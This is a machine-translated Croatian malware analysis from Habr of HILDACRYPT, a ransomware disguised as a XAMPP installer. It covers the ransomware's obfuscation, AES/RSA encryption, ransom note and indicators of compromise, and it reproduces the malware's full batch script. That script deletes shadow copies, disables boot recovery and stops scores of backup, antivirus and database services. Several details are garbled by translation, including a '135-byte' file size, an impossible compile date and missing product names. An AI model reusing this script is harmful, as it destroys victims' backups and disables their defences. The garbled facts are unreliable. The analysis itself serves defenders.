Pozdrav, Habr! Ponovno govorimo o najnovijim verzijama zlonamjernog softvera iz kategorije Ransomware. HILDACRYPT je novi ransomware, član obitelji Hilda otkriven u kolovozu 2019., nazvan po Netflix crtiću koji je korišten za distribuciju softvera. Danas se upoznajemo s tehničkim značajkama ovog ažuriranog ransomware virusa.
U prvoj verziji Hilda ransomwarea, poveznica na jedan objavljena na Youtubeu crtana serija sadržana je u otkupninskom pismu. HILDACRYPT se predstavlja kao legitimni XAMPP instalacijski program, Apache distribucija koja se lako instalira i uključuje MariaDB, PHP i Perl. U isto vrijeme, cryptolocker ima drugačiji naziv datoteke - xamp. Osim toga, ransomware datoteka nema elektronički potpis.
Statička analiza
Ransomware se nalazi u PE32 .NET datoteci napisanoj za MS Windows. Njegova veličina je 135 bajtova. I glavni programski kod i zaštitni programski kod napisani su u C#. Prema datumu i vremenskoj oznaci kompilacije, binarna datoteka je stvorena 168. rujna 14.
Prema Detect It Easy, ransomware se arhivira pomoću Confuser-a i ConfuserEx-a, ali ovi obfuscatori su isti kao i prije, samo što je ConfuserEx nasljednik Confuser-a, tako da su im potpisi koda slični.
HILDACRYPT je doista upakiran s ConfuserEx.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Vektor napada
Najvjerojatnije je ransomware otkriven na jednoj od web stranica za programiranje, maskiran kao legitiman XAMPP program.
Cijeli lanac infekcije može se vidjeti u .
Zamagljivanje
Nizovi ransomwarea pohranjuju se u šifriranom obliku. Kada se pokrene, HILDACRYPT ih dekriptira pomoću Base64 i AES-256-CBC.
Instalacija
Prije svega, ransomware stvara mapu u %AppDataRoaming% u kojoj se nasumično generira parametar GUID (Globally Unique Identifier). Dodavanjem bat datoteke na ovo mjesto, ransomware virus je pokreće pomoću cmd.exe:
cmd.exe /c JKfgkgj3hjgfhjka.bat & izlaz
Zatim počinje izvršavati skupnu skriptu za onemogućavanje značajki ili usluga sustava.
Skripta sadrži dugačak popis naredbi koje uništavaju kopije u sjeni, onemogućuju SQL poslužitelj, backup i antivirusna rješenja.
Na primjer, bezuspješno pokušava zaustaviti Acronis Backup usluge. Osim toga, napada backup sustave i antivirusna rješenja sljedećih proizvođača: Veeam, Sophos, Kaspersky, McAfee i drugi.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Nakon što su gore spomenuti servisi i procesi onemogućeni, cryptolocker prikuplja informacije o svim pokrenutim procesima pomoću naredbe tasklist kako bi osigurao da sve potrebne usluge ne rade.
popis zadataka v/fo csv
Ova naredba prikazuje detaljan popis pokrenutih procesa, čiji su elementi odvojeni znakom “,”.
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Nakon ove provjere, ransomware započinje proces enkripcije.
Šifriranje
Enkripcija datoteke
HILDACRYPT prolazi kroz sav pronađeni sadržaj tvrdih diskova, osim mapa Recycle.Bin i Reference AssembliesMicrosoft. Potonji sadrži kritične dll, pdb itd. datoteke za .Net aplikacije koje mogu utjecati na rad ransomwarea. Za traženje datoteka koje će biti šifrirane koristi se sljedeći popis ekstenzija:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
Ransomware koristi algoritam AES-256-CBC za šifriranje korisničkih datoteka. Veličina ključa je 256 bita, a veličina vektora inicijalizacije (IV) je 16 bajtova.
Na sljedećoj snimci zaslona vrijednosti byte_2 i byte_1 dobivene su nasumično korištenjem GetBytes().
ključ
U I
Šifrirana datoteka ima nastavak HCY!.. Ovo je primjer šifrirane datoteke. Gore spomenuti ključ i IV stvoreni su za ovu datoteku.
Šifriranje ključem
Cryptolocker pohranjuje generirani AES ključ u šifriranu datoteku. Prvi dio šifrirane datoteke ima zaglavlje koje sadrži podatke kao što su HILDACRYPT, KEY, IV, FileLen u XML formatu i izgleda ovako:
Enkripcija AES i IV ključa vrši se pomoću RSA-2048, a kodiranje pomoću Base64. RSA javni ključ pohranjuje se u tijelu cryptolockera u jednom od šifriranih nizova u XML formatu.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
RSA javni ključ koristi se za šifriranje ključa AES datoteke. RSA javni ključ kodiran je Base64 i sastoji se od modula i javnog eksponenta 65537. Za dešifriranje je potreban RSA privatni ključ koji napadač ima.
Nakon RSA enkripcije, AES ključ se kodira pomoću Base64 pohranjenog u šifriranoj datoteci.
Poruka o otkupnini
Nakon što je šifriranje završeno, HILDACRYPT zapisuje html datoteku u mapu u kojoj je šifrirao datoteke. Obavijest o ransomwareu sadrži dvije e-mail adrese na koje žrtva može kontaktirati napadača.
Obavijest o iznuđivanju također sadrži redak "Nijedna loli nije sigurna;)" - referenca na likove iz animea i mange s izgledom djevojčica zabranjenih u Japanu.
Izlaz
HILDACRYPT, nova obitelj ransomwarea, izdala je novu verziju. Model enkripcije sprječava žrtvu da dekriptira datoteke šifrirane ransomwareom. Cryptolocker koristi metode aktivne zaštite kako bi onemogućio usluge zaštite povezane sa sustavima za sigurnosno kopiranje i antivirusnim rješenjima. Autor HILDACRYPT-a obožavatelj je animirane serije Hilda koja se prikazuje na Netflixu, a čiji se link na trailer nalazio u otkupnom pismu za prethodnu verziju programa.
Kao i obično, и može zaštititi vaše računalo od HILDACRYPT ransomwarea, a pružatelji usluga imaju mogućnost zaštititi svoje korisnike s . Zaštita je osigurana činjenicom da ova rješenja uključuju uključuje ne samo sigurnosnu kopiju, već i naš integrirani sigurnosni sustav - Pokreće ga model strojnog učenja i temelji se na heuristici ponašanja, tehnologija koja se kao nijedna druga može suprotstaviti prijetnji ransomwarea nultog dana.
Pokazatelji kompromisa
Ekstenzija datoteke HCY!
HILDACRYPTReadMe.html
xamp.exe s jednim slovom "p" i bez digitalnog potpisa
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Izvor: www.habr.com